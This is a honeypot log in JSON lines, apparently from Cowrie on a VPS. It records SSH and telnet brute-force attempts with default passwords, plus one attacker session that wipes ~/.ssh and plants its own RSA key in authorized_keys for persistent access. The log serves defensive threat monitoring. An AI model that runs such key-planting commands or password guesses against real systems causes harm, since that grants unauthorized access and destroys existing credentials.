{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:34:08.196720Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.login.failed","username":"jim","password":"7777777","message":"login attempt [jim/7777777] failed","sensor":"my-vps","timestamp":"2025-08-28T11:34:08.484416Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abc123","message":"login attempt [jim/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:34:09.538054Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abcd123","message":"login attempt [jim/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:34:10.591693Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abcd1234","message":"login attempt [jim/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:34:11.644681Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.login.failed","username":"jim","password":"abc1234","message":"login attempt [jim/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T11:34:12.698413Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:34:13.760148Z","src_ip":"80.94.95.15","session":"37c1d2417872"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52522,"dst_ip":"1.2.3.4","dst_port":22,"session":"48f0db707ff5","protocol":"ssh","message":"New connection: 212.227.125.160:52522 (1.2.3.4:22) [session: 48f0db707ff5]","sensor":"my-vps","timestamp":"2025-08-28T11:34:35.633743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:34:35.730998Z","src_ip":"212.227.125.160","session":"48f0db707ff5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:34:35.804997Z","src_ip":"212.227.125.160","session":"48f0db707ff5"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:34:36.488677Z","src_ip":"212.227.125.160","session":"48f0db707ff5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:34:37.660737Z","src_ip":"212.227.125.160","session":"48f0db707ff5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56636,"dst_ip":"1.2.3.4","dst_port":23,"session":"ebdc1cbfe355","protocol":"telnet","message":"New connection: 212.227.125.160:56636 (1.2.3.4:23) [session: ebdc1cbfe355]","sensor":"my-vps","timestamp":"2025-08-28T11:34:46.121764Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:34:46.457221Z","src_ip":"212.227.125.160","session":"ebdc1cbfe355"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:34:46.472718Z","src_ip":"212.227.125.160","session":"ebdc1cbfe355"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T11:34:46.473899Z","src_ip":"212.227.125.160","session":"ebdc1cbfe355"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T11:34:46.474910Z","src_ip":"212.227.125.160","session":"ebdc1cbfe355"}
{"eventid":"cowrie.session.connect","src_ip":"183.100.153.97","src_port":45613,"dst_ip":"1.2.3.4","dst_port":23,"session":"992b8542f47e","protocol":"telnet","message":"New connection: 183.100.153.97:45613 (1.2.3.4:23) [session: 992b8542f47e]","sensor":"my-vps","timestamp":"2025-08-28T11:34:48.681230Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33376,"dst_ip":"1.2.3.4","dst_port":22,"session":"6296c893978e","protocol":"ssh","message":"New connection: 212.227.125.160:33376 (1.2.3.4:22) [session: 6296c893978e]","sensor":"my-vps","timestamp":"2025-08-28T11:35:16.884522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:35:16.954397Z","src_ip":"212.227.125.160","session":"6296c893978e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:35:17.101549Z","src_ip":"212.227.125.160","session":"6296c893978e"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:35:17.729221Z","src_ip":"212.227.125.160","session":"6296c893978e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:35:18.901473Z","src_ip":"212.227.125.160","session":"6296c893978e"}
{"eventid":"cowrie.session.closed","duration":30.38054871559143,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:35:19.061681Z","src_ip":"183.100.153.97","session":"992b8542f47e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47840,"dst_ip":"1.2.3.4","dst_port":22,"session":"147c8ad7c205","protocol":"ssh","message":"New connection: 212.227.125.160:47840 (1.2.3.4:22) [session: 147c8ad7c205]","sensor":"my-vps","timestamp":"2025-08-28T11:35:59.028575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:35:59.033392Z","src_ip":"212.227.125.160","session":"147c8ad7c205"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:35:59.285984Z","src_ip":"212.227.125.160","session":"147c8ad7c205"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T11:36:00.363994Z","src_ip":"212.227.125.160","session":"147c8ad7c205"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:36:01.607605Z","src_ip":"212.227.125.160","session":"147c8ad7c205"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46736,"dst_ip":"1.2.3.4","dst_port":22,"session":"6098046d2b83","protocol":"ssh","message":"New connection: 212.227.125.160:46736 (1.2.3.4:22) [session: 6098046d2b83]","sensor":"my-vps","timestamp":"2025-08-28T11:36:42.210649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:36:42.212319Z","src_ip":"212.227.125.160","session":"6098046d2b83"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:36:42.394507Z","src_ip":"212.227.125.160","session":"6098046d2b83"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345","message":"login attempt [ubuntu/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T11:36:43.297604Z","src_ip":"212.227.125.160","session":"6098046d2b83"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:36:44.483462Z","src_ip":"212.227.125.160","session":"6098046d2b83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42112,"dst_ip":"1.2.3.4","dst_port":22,"session":"30948ba29ec2","protocol":"ssh","message":"New connection: 212.227.235.229:42112 (1.2.3.4:22) [session: 30948ba29ec2]","sensor":"my-vps","timestamp":"2025-08-28T11:37:06.212151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T11:37:06.292073Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T11:37:07.462774Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.login.success","username":"root","password":"123456aS","message":"login attempt [root/123456aS] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:37:10.940892Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:37:11.493361Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:37:11.494105Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:37:11.495278Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:12.076252Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:37:12.425229Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:37:12.425913Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:37:13.303758Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:13.304714Z","src_ip":"212.227.235.229","session":"30948ba29ec2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43564,"dst_ip":"1.2.3.4","dst_port":22,"session":"28de635912ed","protocol":"ssh","message":"New connection: 212.227.235.229:43564 (1.2.3.4:22) [session: 28de635912ed]","sensor":"my-vps","timestamp":"2025-08-28T11:37:14.246929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T11:37:14.250954Z","src_ip":"212.227.235.229","session":"28de635912ed"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T11:37:14.524355Z","src_ip":"212.227.235.229","session":"28de635912ed"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:37:21.564218Z","src_ip":"212.227.235.229","session":"28de635912ed"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:37:23.861455Z","src_ip":"212.227.235.229","session":"28de635912ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45324,"dst_ip":"1.2.3.4","dst_port":22,"session":"d535ee726204","protocol":"ssh","message":"New connection: 212.227.235.229:45324 (1.2.3.4:22) [session: d535ee726204]","sensor":"my-vps","timestamp":"2025-08-28T11:37:24.122101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T11:37:25.369719Z","src_ip":"212.227.235.229","session":"d535ee726204"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T11:37:25.630888Z","src_ip":"212.227.235.229","session":"d535ee726204"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53376,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cd3516ac596","protocol":"ssh","message":"New connection: 212.227.125.160:53376 (1.2.3.4:22) [session: 0cd3516ac596]","sensor":"my-vps","timestamp":"2025-08-28T11:37:28.566330Z"}
